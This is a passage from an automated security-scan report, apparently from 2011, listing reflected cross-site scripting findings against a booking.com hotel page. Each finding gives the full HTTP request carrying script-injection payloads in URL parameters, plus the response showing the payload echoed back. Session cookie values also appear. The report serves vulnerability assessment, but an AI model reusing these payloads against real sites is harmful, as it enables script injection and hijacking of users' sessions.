IWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:18 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbngn4lN%2BjiaMM3%2FFSz5aK01fZviYAwYW1RyxkX%2BBXQhpWnHNnQ%2BTxQuoiSxBYaF6mm%2FY2WSy0TkgYM%2BaKM7XjRzQsF7X8fJX9B96maybTSPEvrynbwEUbiqnzI%2FesVse7IJaTfI5Vn%2BI3ZvyxVvPK8XUNRomoGf5CH0geme1mD2JyZyMbEoHKs4%2F1EA8q4JLLwQXIlBra1pMYeTZ%2F5LI2kgBVEbxrKIrk5Dr7gfTEwnFs0XibpKwY5ohRh0ODSnta71Ro1K3heWdpa2kdUegQgtJfeyTUgjQxyB81L9DSk1BBkHKVzVnHmG%2B0cuvr95g17s6X73En5yB3lIjNpO6mOynbT5LZoCDYydE2VMcs0Eu0yKoqvq6d6rW8oibWnh2Xe6t8LFZok7KESzbiXrwdUl6JDqnM4pADTKIiHHvQszS9tJ%2Bt735RH3mV12YAARFIfO06w8kN0%2Bm0Mg8k0sRKulZzIxYXmU4M1QTJLF5WUo%2FaGitJdm%2FaJ%2BaQ1ahwfBO%2BYmeMEHQDFqyCJSrv%2FNE8jRwuRmrStokdeuUkLHeBgOY%2ByTwOF%2BTtMULnT3ol%2FlCgatG2qA61R1uNe9VYhE5%2BShiqmCPIMEC6MKl959MPDvcikcj38q%2Bv8%2BkI5KpshJj0ZEFNhqPEkCmi%2B5uJvBUHNcOVjwkmjsHZZYWLjN04QovQwSw6nNElx6fZdxPsP%2BQduIL1CZ0kiBgLXwB1pMgCze37KXiiR5dO1zkFKJ3cYVD1VozjzGMAarn4PkhZEbymLfEmYTsC3pQnRMDUz%2FvQGFrKL%2F8ZeDty0tpYIW%2FuZEBzIVpGDnc9Psi1EX%2BdlhGCwricrrrWCLRigOisjsQg%2BLpQPkxP6YaaLCrXziB1FbBd4rNJazeVN%2BcZwtLpUmD0HVF7%2FlzVl8qzFcjdZsS0ot6PpfRaXLYKBbR9lBI5XGzZ4cIirEmubiMlUVSEiGapDhfSP%2FqQ3Ka23Sj8jhjS%2BBb1ZKSYKUzhhxaONtB5kkd13%2Fl1Rtp84dBmkTabsIMPgCT1wd2cEFQBljPHwnQt%2FrKoNXpsuCAr3kYXYBbN2UzXLUkI5EmPH%2FW%2B2cUVJb3zLLH0I9G%2B9%2F4sY%2BIT2f%2BYSA0YkMXg7EJ031%2BguShzeXnxeGgd35JCC0eHJhEmrGgl%2B9OO%2Fi5qL8UvodoCGGnqaGr7WISAHp4CG%2BvpmGtB1NATvLQ1jL57TPz%2Bg5jzj0QJ8yP47s2VwqLvdd8nDkPzQJIR9S%2F%2FgfKrYPlJoq8GSWZY2OL8NOIoRAxlQvI4i5UrGXPk98252QCOJVAx%2FgrwLY8FtDJcOad9gaiRlKcwZd1T2YfvK4mbPoYQXDjDsfLIXke2KzkuYOhBh88yRjK%2FoKAM26x%2Bd%2F2LUJoeC7tS6GtCHtJWnhuGNsJkkU1jYzLXpXO6ytIWRyzPe6%2FnziWbk5qWohYr0%2FT2g%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:18:19 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 244918
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
p://www.booking.com/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X174577</script><script>alert(1)</script>db952ffff6a',
b_this_url : '/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;dva=0',

"setvar_affiliate_is_bookings2
...[SNIP]...

4.201. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of the aid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87a75"><script>alert(1)</script>aac1708aa5d was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X187a75"><script>alert(1)</script>aac1708aa5d HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:38 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbrwVl5xDk4n3xHvjoyWEf1%2BWIgLGQJ%2Fr1v%2B3I75L5T0i%2B97JWuV5Nnceo8TqjdepyTcSSg4MSst%2Fu4alaf5Syh0QOEwJ%2B6XffhiF5Nn9HUl4UlHnbAnhwujcnYc23V9htXCDLw64w%2BL6jvllQGrMoJW7DoKTAIsjX3jG2T8fTRXnhwNQv11xn%2FOoOBH6xVdCyB1iQrD8GmnMyMRkZhTgcW61wBhtjZQEX%2FyejMvpz3NzaUySvMw5LIP%2FypeQs6pE0HcDEoBa5SCMF%2B46NawLf0DcWUaClAONsA8%2ForchHjMLUWhSuazcsh13YF%2Bz9fryS97m%2FHS9jwnBlw4jbJY%2FNXm477poJeBHQTQjkXwyAeXyVUdt0os0d2KNDJoblZq6%2BtWbWyMTxCjkH6bMACdBx2TMNM%2B%2BgVYTP9Uoegf7Dnyi1CmL1%2BlPZA9Hd40RnnmO%2BX8b60LKttX3QWvxDNrffSkKJuqfG5VvuFDMTCyshVABX%2B%2FudaV4JCnWb8x5dimR5EfsZhKwofvX6l2u6q6k4KN8JYe%2FWOEr7wedRfEPQsPI6FWyeduK5c%2Bhv0bhY%2FpxJKfcIg9ICFbxUhMBaAucsI2y4JEI7lIWfQJsv2Atlm2g7aWlUTQU2ieP0OyGcsZXpNx330YvN6ixXsATicWIxP0skGePfh5hfAGgOFeOBKG70MjBCy9gu8rYneWqqEzzr9yqqlZw0exU9awqDx4q%2BEmj7iSbKksfT4g5%2Fgx7C96tTT1%2BHAH%2B7ucvl1o9MRMUQAjJYmGMZArPHRVTThedUE2f9%2Bd0ORL2zmOQuvqYV8zQ6zAqlM9V%2F29b%2Fx9DacQFZ5wO9najDd5IjWuTT3R61BTIgenmypSb5pZrP6C36qcMtroeC6umkf2RttEIQEM%2Ftea3hS6L2zyVI%2FKkkB7zsxjJD5qqRH9ypiQNnvTxw1%2FQE%2F6laeDvbddHLVanQUq6f%2B6Mg%2BV9c9dlOyKlmXptnRoy87cCmClDx9il4ifUzi4NObwfTBRWC9RifIvkFNyeDFsw1wLgvcTb%2FwGvy1FuKo7MyX5b0H%2FWXbI1wXgepKLFSi6zuqqGg1rgtidYjyNY6db2%2Bc5JoozB2JMZNn9i1B2sHd4IRpfD5UaUERMSMu%2BYv3jURjG1%2FsIeTPb71vfe7In3%2FqssjrbBMPGW2gziGMSR8avDkI%2FAWZeNRpCVibuRMDlIYdMUOr13uQLu2TQPZEOpByoq7Wl3BJoDvsh20XRy1Si8KHgVIS92GUC1i86PzSKLvr4ONZCm7nkqFB7kO8EQv8KyjI0ZygDjExcV2RzwahpdfY20H1qgOHZlGSsKlXonMHjmaQbUm%2Fz6BQakWrHGUWih4GY7meJVBKmjJapx%2BBVT99EV5AyeFfg6hPHaHHng4jkOk2eQnKYiNNCouMH7b3CaNdKPV3TrOExfwYjI7cipe%2FPl4w%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:16:39 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 244901
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
p://www.booking.com/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X187a75"><script>alert(1)</script>aac1708aa5d">
...[SNIP]...

4.202. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b59c'-alert(1)-'c9428a7f052 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1&4b59c'-alert(1)-'c9428a7f052=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:55 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbrwVl5xDk4n3xHvjoyWEf1%2B2jJT0X%2B8rChyqM7yysg1FGs9IvgNEDxWLU94%2FE%2BcAbif%2BNQSnyQA5GWRSlyIlO3urvu3ODBMyPnmIXRXfZNRssJhHH8beCoDih1vT%2Bw5dk75YQK0bvBE4BO%2Bo3xt4otM7WVTXzgKZS16cUl6W6dr%2BP%2FwHo%2BDG1IMW4BNha120wThGlL%2FYtRNux3Ys%2FG5LcMOhYVqHPI3y8p9o949nJaosdn2Wa7ZJ3HdEfXNC1KarWhmAA%2BsR0iFXk%2Bgk1KSAhGspoEHMtfv%2BaAPKKrGIBkKImbGTbZ0DRUXD8iGkM5AFfSXqwL6BuNExy8%2F15NskuXCtKhiBmLG%2B%2FoS7svWDcGsAMwzNJIEyikWcQLrHx8bIg9JnycJfRVphgAkkiXJkK2otimFTLH4HEMYKzZtU3FWzg7FeVlnOroUMYg9VHzwUTMfXxUk%2BGpsrN7N1OoiVZXul5LsFT9%2BzQPE%2FVZG4YZq59Pufz64ZUpT%2Bo76VgQhHMkbdQmY0vV2gQGwDtWsDYpGPa3UIGA%2FOuVCULiYOsOqEo1kucvGmzzYFdCIipjB1%2FsrMhFETlzYDmoHAdb4duykgrZuSCBEZGoXdh%2FTFYRiYZYe%2BpZ0xkrd1VHYj1dUWdnzOB2zMyBc3x2C4n9W0BIMx8TqG3vjpd5VlI3Si1WWyXaKeZsb%2FJFiLb5NrJI6fsqzyQOWbV53RJFUSD%2FWYuxghuW0%2F0139DcCZDLSWoiCqQ2lQaRYXfz3Lap6KhXtFk43ZO3WpdcK9kpdKoaHBl9BydbiWiI2Kldc78d40F7zdYKdGodWCZlmNTyX8QV6uH2hPrFUtRT8fa8hkS4YMGVcpJslgFaTkZBf2YzYIYZg%2BGuGpSx3ImmTt%2Bnnvh32i7LTi1tVcoBs%2FpQrq2dX8tc603MfW13lGvOzpuCA39nVJ6maKdKgaGlhMSFPEChuSVbhmgJLfV57SmaTD69hrqWyN7EHXHPnc%2FHmRstCR0nNj7GlqbiI54Bzqi7U9vADN3hD9pa0Ncpyrhwes%2Fp0WplHD7lmkAa1GbnRBCyLYl3%2FksCX4GGAYrRhoAhw2IdCdDSXX9chmxNETjylJcs4mXw1G0zCpnCsuveNt8Nc4BPZFj3G4A00nsqQrg%2BovwgdQajdHtw%2FIl7vOBC9TiXgfVKkJGXn%2F%2Fl%2Fr%2FYDWapN8vpskDKrCmG%2F%2Bw63UVgZ8rBvSLkeQqjG8Fvewcar6ehhmA8L22fBtJAYNv0DZLXJhxq5soOIInjGHIAa2%2FhjYKjFcgERN9TTZpmSpy%2FAXLC1mtswtnXquScz6QmgNDuPH2V5%2FZaRJj11PZCvSFfPZjWLkNgAPgWFZIJAUAEnNK1So4AE2HHhq4Ki3nBMbB7cycYJ%2F3T35VIP3071xmlxvGpY4rmxT0unLLRRlJKoi2ZNAt6lsL0JSuc7Tcw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:18:55 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 249101
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
translate = 'show automatic translation';
var transl_undo = 'undo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/copley-square.en.html?4b59c'-alert(1)-'c9428a7f052=1';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.env.b_southwest_l
...[SNIP]...

4.203. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5695f"><script>alert(1)</script>df25147b85d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1&5695f"><script>alert(1)</script>df25147b85d=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:38 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbrwVl5xDk4n3xHvjoyWEf1%2B2jJT0X%2B8rChyqM7yysg1FGs9IvgNEDxWLU94%2FE%2BcAbif%2BNQSnyQA5GWRSlyIlO3urvu3ODBMyPnmIXRXfZNRssJhHH8beCoDih1vT%2Bw5dk75YQK0bvBE4BO%2Bo3xt4otM7WVTXzgKZS16cUl6W6dr%2BP%2FwHo%2BDG1IMW4BNha120wThGlL%2FYtRNux3Ys%2FG5LcMOhYVqHPI3y8p9o949nJaosdn2Wa7ZJ3HdEfXNC1KarWhmAA%2BsR0iFXk%2Bgk1KSAhGspoEHMtfv%2BaAPKKrGIBkKImbGTbZ0DRUXD8iGkM5AFfSXqwL6BuNExy8%2F15NskuXCtKhiBmLG%2B%2FoS7svWDcGsAMwzNJIEyikWcQLrHx8bIg9JnycJfRVphgAkkiXJkK2otimFTLH4HEMYKzZtU3FWzg7FeVlnOroUMYg9VHzwUTMfXxUk%2BGpsrN7N1OoiVZXul5LsFT9%2BzQPE%2FVZG4YZq59Pufz64ZUpT%2Bo76VgQhHMkbdQmY0vV2gQGwDtWsDYpGPa3UIGA%2FOuVCULiYOsOqEo1kucvGmzzYFdCIipjB1%2FsrMhFETlzYDmoHAdb4duykgrZuSCBEZGoXdh%2FTFYRiYZYe%2BpZ0xkrd1VHYj1dUWdnzOB2zMyBc3x2C4n9W0BIMx8TqG3vjpd5VlI3Si1WWyXaKeZsb%2FJFiLb5NrJI6fsqzyQOWbV53RJFUSD%2FWYuxghuW0%2F0139DcCZDLSWoiCqQ2lQaRYXfz3Lap6KhXtFk43ZO3WpdcK9kpdKoaHBl9BydbiWiI2Kldc78d40F7zdYKdGodWCZlmNTyX8QV6uH2hPrFUtRT8fa8hkS4YMGVcpJslgFaTkZGYQqYxL1sSvVqTnUmzmugpmpRSzRkBSpOh31GzWDodNw%2BBEGQa0nea5Lpg6nnyuK2eV11wwK6wKiY2lVUUdupSNWbDKGw1X9VfEy%2FiPC3BRzY7Zk9wCR3H78dV4uP2EFit9cWxeZywnYWq3yBhONlrfMFTXhRoEHI6J%2BU2aTps%2F17SEh3X30VhKXS2SMDhMhvt8x9GX1Od9PQ6MBILoPrnteyG1do80hxRDtD%2F%2Be7FPFaaKJZilHc8GqlrbnjtNuUdfGUAGT5IpxIu2bYkavYrKyAJt3xYGVZU8%2FpJufdYQIUvdxPL5zP2WdLr0yiUDT92ZZmv%2FoOdOSqwEe71hkjhECn5p7hTuAu2xeGuQJdXZl1nus%2Fua80FKUoSj8Gc%2FLi6UE8S0R4armDgjmevOq%2FtICUFlMuZI7sA0aN25aq8HO9%2FsExcvaJvW9nHsV8USobKjr%2F08ZbFUOyOTi1f23waD2IquS1IV5ndc0KIjztx6BupqHNub9betLN4zxmzAKVsla76LGh0lzzzsKeIOXSoU7WrShupoPhbjXtk7Ha%2BWkNzWxUG0NcQeeuLen59v6g%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:18:39 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 249285
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
